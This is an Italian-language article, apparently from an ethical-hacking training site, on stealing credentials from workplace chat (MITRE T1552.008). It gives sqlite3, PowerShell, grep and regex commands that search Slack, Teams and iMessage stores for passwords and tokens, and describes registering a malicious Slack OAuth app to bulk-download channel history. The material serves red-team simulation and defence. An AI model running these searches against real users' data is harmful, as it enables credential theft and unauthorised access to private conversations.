Chat Messages: Furto Credenziali dalle Conversazioni (T1552.008)

Le piattaforme di collaborazione aziendale rappresentano un tesoro nascosto per gli attaccanti che cercano credenziali. Questa tecnica sfrutta la cattiva abitudine degli utenti di condividere password, API key e token direttamente nei messaggi di chat, email o commenti su tool come Slack, Teams, Jira o Trello.

L'approccio rientra nella tattica TA0006 (Credential Access) della kill chain, posizionandosi nella fase di raccolta credenziali per movimenti laterali successivi. Gli avversari possono accedere a questi dati direttamente dalle applicazioni installate sugli endpoint, dai server che ospitano i servizi o attraverso i portali amministrativi cloud.

LAPSUS$ ha dimostrato l'efficacia di questa tecnica colpendo sistematicamente Slack, Teams, JIRA e Confluence per estrarre credenziali esposte. Il gruppo cerca pattern specifici nei messaggi come "password is" o configurazioni con token hardcoded, trasformando le conversazioni casuali in punti d'accesso privilegiati.

Le conversazioni aziendali nascondono spesso segreti in bella vista. Per simulare questa tecnica, inizia con ricerche mirate sui client locali.

Su Windows, Slack memorizza i messaggi in SQLite:

*sqlite3 "%APPDATA%\Slack\IndexedDB\https_app.slack.com_0.indexeddb.leveldb"*
*SELECT * FROM messages WHERE text LIKE '%password%' OR text LIKE '%token%' OR text LIKE '%key%';*

Teams conserva cache interessanti nel profilo utente. PowerShell può estrarre rapidamente pattern sospetti:

*Get-ChildItem -Path "$env:APPDATA\Microsoft\Teams" -Recurse -Include *.json,*.log | Select-String -Pattern "password|token|bearer|api[_-]?key" -Context 2*

Per Slack via API, configura uno Slack Workflow automatizzato che cerca credenziali. Il bot può scansionare retrospettivamente tutti i canali accessibili cercando regex come (password|pwd|pass)\s*[:=]\s*\S+ o pattern JWT eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+.

Su macOS, i database di Messages.app contengono conversazioni iMessage aziendali:

*sqlite3 ~/Library/Messages/chat.db "SELECT text FROM message WHERE text LIKE '%@company.com%' AND (text LIKE '%password%' OR text LIKE '%vpn%')"*

L'approccio più sofisticato sfrutta le integrazioni OAuth. Registra un'app Slack malevola che richiede scope channels:history e groups:history. Una volta autorizzata, scarica bulk di conversazioni via:

*curl -X GET "https://slack.com/api/conversations.history?channel=C1234567890&limit=1000" -H "Authorization: Bearer xoxb-your-token"*

Linux presenta opportunità uniche con tool CLI come slack-term che salvano token in plaintext. Cerca configurazioni esposte:

*find /home -name ".slack*" -o -name "*slack*conf*" 2>/dev/null | xargs grep -E "token|cookie|session"*

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo